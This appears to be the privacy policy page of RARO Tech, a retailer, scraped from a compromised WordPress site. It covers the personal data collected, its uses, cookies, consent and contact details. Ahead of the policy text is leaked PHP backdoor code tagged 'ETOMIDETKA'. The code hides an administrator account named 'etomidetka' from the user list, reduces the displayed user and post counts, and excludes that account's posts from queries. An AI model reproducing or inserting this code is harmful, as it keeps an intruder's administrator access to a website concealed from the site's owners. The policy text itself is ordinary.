//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); Privacy Policy | RARO Tech

RARO Tech requests to all respective customers to read the Privacy Policy. To register at our website, to make or place an order you may need to share your name, contact number, address, email or any such related information.

Data required or may you have to share through our website, messenger, and cookies.

  • First and last name
  • Mobile phone number
  • Details contact address
  • Email address
  • Postal address with post code
  • Financial transaction information
  • Any other information as per registration process

How RARO Tech Receives Customer Personal Contact Information?

RARO Tech receives customer personal contact information through website, contact form or messenger.

What RARO Tech does with Customer Contact Information?

•           For necessary communication if required.

•           To improve customer services

•           To support customers requirement

•           For update offers and news.


RARO Tech uses cookies and related technologies for better access experience of the customer. If you don’t wish to accept cookies just decline the use of cookies at your browser.


If you wish that RARO Tech will not use your data anymore which you have shared earlier, just let us know your consent through email mentioning details request. We never disclose your information to any third party for commercial purpose except country law enforcement department.

Customer Consent

By sharing your information through website or messenger you consent to RARO Tech privacy policy.


If you have any questions about this Privacy Policy, please contact us as follows:

  1. You may email us at ask@rarotech.com
  2. You may call us at +8801303-922737
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